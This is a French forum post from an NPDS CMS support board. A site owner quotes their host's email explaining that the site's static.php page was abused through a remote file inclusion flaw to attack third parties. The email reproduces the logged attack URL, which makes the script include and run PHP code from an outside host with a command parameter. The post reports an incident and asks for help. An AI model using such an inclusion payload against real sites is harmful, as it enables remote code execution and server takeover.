NPDS - Gestion de Contenu et de Communauté Open Source

Citation : Anonyme

Oufti ... voici ce que me répond mon hébergeur ...

Bonjour,

,- - [ Le samedi 21 février 2004 vers 15:44 tanatloc écrivait: ] - -

|

> Que voulez-vous dire ?

> Votre serveur s'est fait hacké à cause de certains CMOD 777 placés sur mon

> site ???

|

`- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Il ne s'agit pas pour nous d'un hacking de notre serveur, seul votre site est concerné.

Nous ne pouvons affirmer que l'usage qui a été fait de votre site était un hacking ou une fonction volontaire, mais il est probable à 99% que ce soit un hacking...

Dans le cas du hacking (vous seul savez si l'usage qui a été fait de votre site d'attaquer des tiers est l'usage normal que vous souhaitez pour votre site ou non), cela signifie que certains de vos scripts/pages contiennent des trous de sécurité permettant à des tiers d'en faire un usage différent de ce que vous souhaitez.

Le cas concret mentionné dans le log précité concerne la page "/static.php" de votre site, qui a été appelée de la façon suivante :

/static.php?op=http://hack0.tripod.com.br/cse.gif?&cmd=id

Si vous visitez http://hack0.tripod.com.br/cse.gif vous constaterez qu'il s'agit de code php, qui a probablement été placé en !!include!! par votre script et donc exécuté.

Bien à vous...

Heeeeelp que puis-je faire ???